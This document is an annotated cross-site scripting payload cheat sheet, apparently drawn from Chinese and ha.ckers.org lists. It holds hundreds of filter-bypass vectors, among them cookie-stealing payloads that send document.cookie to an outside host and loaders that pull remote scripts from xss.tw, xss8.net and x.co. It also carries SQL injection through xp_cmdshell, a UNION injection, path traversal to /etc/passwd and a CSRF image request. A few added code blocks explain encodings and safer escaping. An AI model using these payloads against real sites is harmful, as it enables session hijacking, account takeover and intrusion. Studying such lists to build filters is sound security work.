<L onclick=alert(1)>click me</L> pops up 1 (the tag name is irrelevant; the onclick handler fires on any element)
<a href="javascript:alert(document.cookie)">click</a> use an <a> tag to pop the dialog (the scheme must be spelled javascript:; note that document.cookie never exposes cookies flagged HttpOnly)
"><img src="" onerror="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))"> When the page filters <script and single quotes, this still gets through: the document.write above outputs <script>alert(1)</script>. To shorten it, merge the arguments into a single call, like String.fromCharCode(76,90,83,66);
"><meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))> When <script> is filtered and JS cannot be called directly, the same trick works through a meta refresh: the code above redirects to javascript:document.write("<script src=xxx></script>"), i.e. it loads the JS file xxx. Shorten it by merging the arguments the same way: String.fromCharCode(76,90,83,66); (caveat: current browsers refuse javascript: URLs in a meta refresh, so this is a legacy-browser vector)
"><iframe src=javascript:alert(document.cookie); height=0 width=0 /> popup through an <iframe>
<iframe src=javascript:with(document)0[body.appendChild(document.createElement('script')).src="http://url.cn/1.js"]></iframe> iframe loader for the cookie-collecting script
<img src=x onerror=appendChild(createElement('script')).src='//js address' /> img-tag loader for the cookie-collecting script (inside an inline handler the unqualified appendChild/createElement resolve through the element and document on the scope chain)
<img/**/src=1/**/onerror="with(document)body.appendChild(createElement('script')).src='script address'" /> workaround when the <script> tag and spaces are both filtered: /**/ comments stand in for the spaces
<img src="5" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
This is echoed back as <img src="5" onerror=eval("alert('xss')")></img>
To load a script instead, use javascript:document.write(unescape(' <script src="script address"></script>')); then hex-encode the result and drop it into eval
Note on the first snippet: the code to be executed is hex-encoded first; in the img error event the JS parser decodes the \xNN escapes while reading the string literal, and eval() then evaluates and executes the decoded alert('xss').
Second snippet (the script loader): the unescape() function decodes the HEX-encoded contents of the parentheses, and document.write() then writes that content into the document object.
Because the parenthesised content has already been decoded by unescape, what is written out is normal markup; without the decode step the output would be the raw hex.
Neither script nor any other dangerous tag appears here, and there are no single quotes, so the bypass succeeds. Bypass for: filtered single quotes plus a few dangerous tags
<script>document.write(String.fromCharCode(put the character codes of your code here));</script> bypass for a filter that strips the equals sign, single quotes, double quotes and spaces
<img src=1 onerror=javascript:alert("\x58S\x53\40\x41t\x74\x61\x63\153e\162")> for when everything that could be filtered has been filtered (mixed \xNN and octal escapes that decode to "XSS Attacker")
<img src=x onerror=alert(/insight-labs/)>, <p onmouseover=alert(/insight-labs/)>insight-labs, <frameset onload=alert(/insight-labs/)>, <body onload=alert(/insight-labs/)> event handlers used to pop the dialog (the regex literal avoids needing quotes)
If "script" is blocked, change it to sc%0aript to get past the check (this relies on the filter and the browser decoding differently; current HTML parsers do not accept a newline inside a tag name)
"h"+"t"+"t"+"p" bypasses a filter that matches on the literal string http
'"><script>alert(/1/)</script><a="
'"><script src=http://x.co/xiHv></script><a="
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
'"><script src="//x.co/xiHv"></script><a="
'"><script src=//xss.tw/2045></script><a="
'"><script src=//xss.tw/3058></script><a="
<script src=//xss.tw/3058></script>
Characters this filter escapes: " (double quote), space, < and >
Payload with no src, no equals sign and no quotes in the injected script:
"></span><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));</script><span>
eval(Dec('203041263543203','2549'));
<div style="display:none"></div><div style="display:none" t="1" e="style\/<'"></div>"/ \""/<img src=# onerror=eval(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,115,115,46,116,119,47,51,48,53,56,62,60,47,115,99,114,105,112,116,62,32));/\>>
<div id="myxsxxcd" style="color:red;display:none" title="if(!window.myxsssxx){window.myxsssxx=123;alert(document.cookie);}">
<DIV><A></A>
<STYLE><!--a{< img src=</STYLE>;x:expression(eval(myxsxxcd.title));<style>}--></style></DIV>
<td width="628" background="/img/index2_r7_c2_r1_c5_s1_s1.jpg">
<img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))>
<img src=x onerror=eval(String.fromCharCode(document.body.appendChild(createElement("script")).src="http://xss.tw/3381"))>
<img src=x onerror=document.body.appendChild(createElement('script')).src="javascript:alert(/1/)">
<img src=x onerror=document.body.appendChild(createElement('script')).src='http://xss8.net/?c=QihaL'>
<p><img class="reference" contenteditable="false" data-refid="2" data-type="reference" onerror="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))" src="http://img.baidu.com/img/baike/editor/reference.gif" unselectable="on" /></p>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))
<div class="qm_left" style="position:relative;z-index:2;background:url(//xss.tw/2180) no-repeat 0 0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='//xss.tw/2180',sizingMethod='scale');width:40px;height:40px;">
<span class="qm_ico_print" id="mail_print" title="打印" onclick="window.open('/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&');"></span>
unescape() is deprecated: ECMAScript keeps it only in Annex B for backwards compatibility and discourages its use,
so decodeURI() and decodeURIComponent() should be used instead. (Note that decodeURIComponent() does not understand the %uxxxx form, which is exactly why the payloads here still call unescape().)
unescape() works by finding character sequences of the form %xx and %uxxxx (x is a hexadecimal digit)
and replacing each one with the Unicode character \u00xx or \uxxxx.
Decoding: unescape('%udcdb%uced3%u8d93%u888a%ud58f%u');
Encoding: escape('%udcdb%uced3%u8d93%u888a%ud58f%ud4c8%udcd9%ud ');
javascript:document.write(unescape('<script src="http://www.xxxx.com/x.js"></script>'));
document.write(String.fromCharCode(60,...,62)); is equivalent to document.write("<script src=http://xss.me/1></script>"); with every character of the markup written as its code point
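The three encodings used above (String.fromCharCode lists, \xNN string literals fed to eval, and the %uXXXX form consumed by unescape) are easier to reason about when you can generate them and then decode them the way the browser's parser will. The block below is an added example, not code from the original page: it builds each form, decodes it back with a decoder that mirrors the JS engine, and runs a naive blacklist (an assumed stand-in for the kind of filter the text describes, matching "<script" and single quotes) against the raw and encoded payloads. The sample payload is constructed.

```javascript
'use strict';

// Form 1: String.fromCharCode(60,115,...). No quotes, no angle brackets, so it
// survives filters that look for "<script" or for quote characters.
function toFromCharCode(s) {
  const codes = Array.from(s, ch => ch.codePointAt(0));
  return `String.fromCharCode(${codes.join(',')})`;
}

// Form 2: a double-quoted JS literal with \xNN for every Latin-1 character
// (\uNNNN beyond that), as used inside eval("...") in the onerror payload.
function toHexLiteral(s) {
  let out = '';
  for (const ch of s) {
    const cp = ch.codePointAt(0);
    out += cp < 0x100
      ? '\\x' + cp.toString(16).padStart(2, '0')
      : '\\u' + cp.toString(16).padStart(4, '0');
  }
  return `"${out}"`;
}

// Form 3: the legacy %uNNNN form that only unescape() decodes.
function toPercentU(s) {
  return Array.from(s, ch => '%u' + ch.codePointAt(0).toString(16).padStart(4, '0')).join('');
}

// Decoders that do what the engine does with each form, without calling eval.
function decodeFromCharCode(expr) {
  const m = /^String\.fromCharCode\(([\d,]*)\)$/.exec(expr);
  if (!m) throw new Error('not a String.fromCharCode(...) expression');
  return String.fromCharCode(...m[1].split(',').map(Number));
}
function decodeHexLiteral(lit) {
  if (lit.length < 2 || lit[0] !== '"' || lit[lit.length - 1] !== '"') {
    throw new Error('expected a double-quoted literal');
  }
  // The parser resolves \xHH and \uHHHH escapes while reading the literal.
  return lit.slice(1, -1).replace(/\\x([0-9a-f]{2})|\\u([0-9a-f]{4})/gi,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}
function decodePercentU(s) {
  // Same rule as unescape(): %uHHHH first, then %HH.
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// Assumed blacklist filter: blocks a literal "<script" and single quotes.
// It sees only the encoded text, which is why every encoded form passes.
function naiveFilterBlocks(s) {
  return /<script|'/i.test(s);
}

// Constructed sample payload; the codes produced match the list on the page.
const SAMPLE = '<script>alert(1)</script>';
```

Run it against SAMPLE: the raw string trips the filter, all three encoded forms do not, and each decoder returns the original markup, which is precisely what document.write() or eval() would receive at execution time.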
"></span><script>document.write(http://baidu.com)</script><span>
[email][url][img]http://xxx.com onmouseover=eval(String.fromCharCode(116,114)); [/img][/url][/email] (BBCode: the img URL is not quoted, so an attribute can be appended)
On mouse click:
<a href="http://www.xyydyt.com" style="color:#143d70; simsun;" onclick="alert(/a/);this.style.behavior='url(#default#homepage)';this.setHomePage('http://www.xyydyt.com'); return(false);">asdasdsad</a>
<table background="javascript:alert(/xss/)"></table> inserting script through a table background attribute (old IE only)
When < and > are filtered, inside a JavaScript string use \x3cscript src=http://www.2cto.com/malicious-code.js\x3e\x3c/script\x3e
<script defer="defer">
var a,b;
a="/";
b="/x.co/xiHv";
window.open(a+b,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");
</script>
<% String str_a = request.getParameter("a"); %>
var a = <%=str_a%>
document.write(a);
<img src="123">
(JSP that reflects parameter a straight into a JavaScript context with no encoding, so any of the string-breaking payloads below work)
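The JSP above writes an untrusted parameter into a JavaScript string, and the "escaping JavaScript escapes" payload further down the page (\";alert('XSS');//) is the standard way to break out of a fix that only backslash-escapes the quote. The block below is an added example, not code from the page: it models the template in JavaScript so it runs offline, renders the script once with the naive escaper and once with a proper JS-string encoder, and executes both with alert replaced by a counter. The template shape and the attacker input are constructed.

```javascript
'use strict';

// Naive fix: put a backslash in front of every double quote. The attacker
// answers with a backslash of their own, which neutralises the added one.
function naiveEscape(s) {
  return s.replace(/"/g, '\\"');
}

// Correct fix for a JS string context: encode every character outside
// [A-Za-z0-9] as \xHH (or \uHHHH). The attacker can then never supply a quote,
// a backslash, a line terminator, or the </script> sequence that would end
// the enclosing script block.
function jsStringEscape(s) {
  return s.replace(/[^A-Za-z0-9]/g, ch => {
    const cp = ch.charCodeAt(0);
    return cp < 0x100
      ? '\\x' + cp.toString(16).padStart(2, '0')
      : '\\u' + cp.toString(16).padStart(4, '0');
  });
}

// Model of the vulnerable template: var a = "<value>"; document.write(a);
// (returning a instead of writing it so the result can be inspected).
function renderTemplate(escape, value) {
  return 'var a = "' + escape(value) + '"; return a;';
}

// Execute the rendered script the way the browser would, with alert()
// replaced by a recorder so we can tell whether the payload broke out.
function execute(src) {
  let alertCalls = 0;
  const a = new Function('alert', src)(() => { alertCalls++; });
  return { value: a, alertCalls };
}

// Constructed attacker input: backslash, double quote, statement, comment.
const PAYLOAD = '\\";alert(\'XSS\');//';

function demo() {
  return {
    naive: execute(renderTemplate(naiveEscape, PAYLOAD)),
    safe: execute(renderTemplate(jsStringEscape, PAYLOAD)),
  };
}
```

With the naive escaper the rendered source is var a = "\\";alert('XSS');//"; return a; so the string ends after one backslash, alert runs, and the rest is a comment. With jsStringEscape the same input comes back as a string equal to the original payload and alert is never reached.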
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('xss')</script>
';exec%20master..xp_cmdshell%20'dir%20c:%20>%20c:\inetpub\wwwroot\?.txt'--&& (SQL injection through xp_cmdshell, not XSS)
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document.domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()} (probe string: if it is reflected unencoded, every quoting context on the page is injectable)
<IMG src="javascript:alert('XSS');">
<IMG src=javascript:alert('XSS')>
<IMG src=JaVaScRiPt:alert('XSS')>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert('XSS')> (this copy carried three more variants of this line that were HTML-entity encoded in the original; the entities were decoded on extraction, so they read the same as the plain form and are not repeated)
<ScRiPt>alert(/123/)</ScRiPt> (mixed-case tag name)
<P><SPAN class="xmsw" title=防火外墙保温材料 onmouseout="window.location=‘http://www.xfydyt.com‘">了解你的产品和行</SPAN></P>
<div style="background-image:url(<script>alert(document.cookie)</script>)">
<div style="background-image:url(javascript:alert(document.cookie))">
<div style="behavior:url('http://www.how-to-hack.org/exploit.html');"> (IE behavior property; spelled "behaviour" in this copy, which IE does not recognise)
<div style="width:expression(alert('x123ss'));">
<img src="java&#script:alert(/1231/);"> (an HTML entity between java and script; its digits were lost in this copy)
<img src=javascript:alert(/1231/);>
<img src="javascript:alert('XSS')">
<IMG src="jav ascript:alert('XaSS');"> (embedded tab; the control character was flattened to a space in this copy)
<IMG src="jav ascript:alert('XbSS');"> (embedded newline; flattened to a space in this copy)
<IMG src="jav ascript:alert('XcSS');"> (embedded carriage return; flattened to a space in this copy)
perl -e 'print "<IMG src=java\0script:alert(\"XSS\")>";' > out (null byte inside the scheme name)
<IMG src=" javascript:alert('XdSS');"> (leading whitespace before the scheme)
<SCRIPT>a=/XSfS/
alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert('XeSS')">
<BODY ONLOAD=alert('XgSS')>
<IMG DYNSRC="javascript:alert('XhSS')">
<IMG LOWSRC="javascript:alert('XiSS')">
<BGSOUND src="javascript:alert('XjSS');">
<span onclick="javascript:changeFont(2);">
<SPAN class="xmsw" title=dd onmouseout=window.location='http://www.xfydyt.com'>test</span>
<span class="xmsw" title="dd" onmouseout=window.location='http://test/test.php?c='+document.cookie>test</span>
<SPAN class="xmsw" title=dd onmouseout=javascript:alert(document.cookie)>test</SPAN>
<br size="&{alert('XkSS')}"> (Netscape 4 JavaScript entity syntax only)
<LAYER src="http://xss.ha.ckers.org/a.js"></layer> (Netscape 4 only)
<LINK REL="stylesheet" href="javascript:alert('XlSS');">
<IMG src='vbscript:msgbox("XmSS")'> (IE only)
<IMG src="mocha:[code]"> (Netscape only)
<IMG src="livescript:[code]"> (Netscape only)
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XoSS');">
<IFRAME src=javascript:alert('XSnS')></IFRAME>
<FRAMESET><FRAME src=javascript:alert('XpSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSqS')">
<DIV STYLE="background-image: url(javascript:alert('X1SS'))">
<DIV STYLE="behavior: url('http://www.how-to-hack.org/exploit.html');"> (IE behavior property; spelled "behaviour" in this copy)
<DIV STYLE="width: expression(alert('X2SS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("X3SS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("X5SS"))'>
<STYLE TYPE="text/javascript">alert('X4SS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('X6SS')");}</STYLE><A class="XSS"></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('X7SS')")}</STYLE>
<BASE href="javascript:alert('X8SS');//">
getURL("javascript:alert('X9SS')") (ActionScript inside a Flash file)
a="get";b="URL";c="javascript:";d="alert('X10SS');";eval(a+b+c+d);
<XML src="javascript:alert('X11SS');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('X12SS');}</SCRIPT><"
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT> (script served from a file with an image extension)
<IMG src="javascript:alert('X13SS')" (half-open tag, deliberately unclosed)
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"--> (server-side include)
<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>;
<DIV STYLE="width:expression(alert('anyunix'));">
<IMG SRC='vbscript:msgbox("anyunix")'>
<STYLE>width:expression(alert('anyunix'));</STYLE>
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript URL
<IMG SRC="javascript:alert('XSS');">
(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (the semicolons are required)
<IMG SRC=javascript:alert("XSS")> (the decimal entities were decoded in this copy)
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) String.fromCharCode (use the encoding calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab splitting the word javascript
<IMG SRC="jav ascript:alert('XSS');"> (the tab was flattened to a space in this copy)
(12) Embedded encoded tab splitting javascript
<IMG SRC="jav ascript:alert('XSS');"> (the tab entity was decoded and flattened to a space in this copy)
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');"> (newline flattened to a space in this copy)
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');"> (carriage return flattened to a space in this copy)
(15) Multi-line embedded JavaScript, the extreme case
<IMG SRC="javascript:alert('XSS')"> (the multi-line form was flattened in this copy)
(16) Working around a length limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script> (appears as eval_r in this copy, a blog filter's rewrite of eval)
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null bytes have little practical effect here because there is usually nowhere to inject them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY ONLOAD=alert('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters prepended (the page lists code points 1-32, 34, 39, 160, 8192-8&13, 12288, 65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with the expression split
<IMG STYLE="xss:expre\ssion(alert('XSS'))">
(50) Anonymous tag with STYLE (any tag name: an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
(52) IMG STYLE method
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) ActionScript inside the Flash file can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .htc file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, put the JS code inside an image file and load that as the script
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command: the image request carries whatever action the target site accepts by GET (a CSRF vector)
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server, redirected by an Apache Redirect directive)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL evasion: IP address instead of hostname
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A> (the percent-encoded hostname was decoded in this copy)
(70) Dword IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding (tabs and newlines inside the URL, flattened to spaces here)
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Dropping http:
<A HREF="//www.google.com/">XSS</A>
(75) Dropping www
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
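Items (70) to (73) work because a browser, like inet_aton(), accepts an IPv4 host written as a single dword, as hex or octal parts, or as fewer than four parts, while a filter comparing strings sees something that is not "192.168.0.1". The block below is an added example, not code from the page: it normalises a host to a dotted quad using those parsing rules (one to four parts; each part decimal, octal with a leading 0, or hex with 0x; the last part fills the remaining bytes; tab, newline and carriage return removed as the URL parser does) and then applies an assumed allow/deny policy for private and loopback ranges of the kind an SSRF or redirect filter would need. All inputs are constructed.

```javascript
'use strict';

// Parse one dotted part the way inet_aton does: 0x.. hex, leading-0 octal,
// otherwise decimal. Anything else (including "08") is not a number.
function parsePart(p) {
  if (/^0x[0-9a-f]+$/i.test(p)) return parseInt(p.slice(2), 16);
  if (/^0[0-7]*$/.test(p)) return parseInt(p, 8);      // "0" alone is octal zero
  if (/^[1-9]\d*$/.test(p)) return parseInt(p, 10);
  return NaN;
}

// Returns the canonical dotted quad, or null if host is not an IPv4 literal.
function normalizeIPv4(host) {
  // Mirror the URL parser: tab/newline/CR are stripped, edges trimmed.
  const h = host.replace(/[\t\n\r]/g, '').trim().toLowerCase();
  const parts = h.split('.');
  if (parts.length < 1 || parts.length > 4) return null;
  const nums = parts.map(parsePart);
  if (nums.some(n => Number.isNaN(n))) return null;

  // Every part except the last is one byte; the last fills the rest.
  const head = nums.slice(0, -1);
  const last = nums[nums.length - 1];
  const restBytes = 4 - head.length;
  if (head.some(n => n > 255)) return null;
  if (last >= 2 ** (8 * restBytes)) return null;

  let value = 0;
  for (const n of head) value = value * 256 + n;
  value = value * 2 ** (8 * restBytes) + last;
  return [24, 16, 8, 0].map(sh => Math.floor(value / 2 ** sh) % 256).join('.');
}

// Assumed policy for an SSRF / open-redirect check: refuse anything that
// normalises into loopback, RFC 1918 space, or the "this network" block.
function isInternalAddress(host) {
  const ip = normalizeIPv4(host);
  if (ip === null) return false;   // hostnames need DNS resolution, handled elsewhere
  const [a, b] = ip.split('.').map(Number);
  return a === 0 || a === 10 || a === 127
    || (a === 192 && b === 168)
    || (a === 172 && b >= 16 && b <= 31);
}
```

Checking the normalised form rather than the raw string is the point: 3232235521, 0xc0.0xa8.0x00.0x01, 0300.0250.0000.0001, 0xC0A80001 and 192.168.1 all come back as 192.168.0.1, and 127.1 as 127.0.0.1.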
Code: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Code: <BODY BACKGROUND="javascript:alert('XSS')">
Code: <BODY ONLOAD=alert('XSS')>
Code: <IMG DYNSRC="javascript:alert('XSS')">
Code: <BGSOUND SRC="javascript:alert('XSS');">
Code: <BR SIZE="&{alert('XSS')}"> (Netscape only)
Code: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Code: <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
Code: <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
Code: <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
Code: <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> (Gecko only)
Code: <XSS STYLE="behavior: url(xss.htc);"> (IE only)
Code: <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
Code: <IMG SRC="mocha:[code]"> (Netscape only)
Code: <IMG SRC="livescript:[code]"> (Netscape only)
Code: <TABLE BACKGROUND="javascript:alert('XSS')">
Code: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Code: <TABLE><TD BACKGROUND="javascript:alert('XSS')">
Code: <DIV STYLE="background-image: url(javascript:alert('XSS'))">
Code: <BASE HREF="javascript:alert('XSS');//">
US-ASCII encoding (found by Kurt Huwig). Using 7-bit ASCII instead of 8-bit gets past many filters, but only when the server talks to the client in US-ASCII; so far Apache Tomcat is the only server seen doing this.
Code: ¼script¾alert(¢XSS¢)¼/script¾
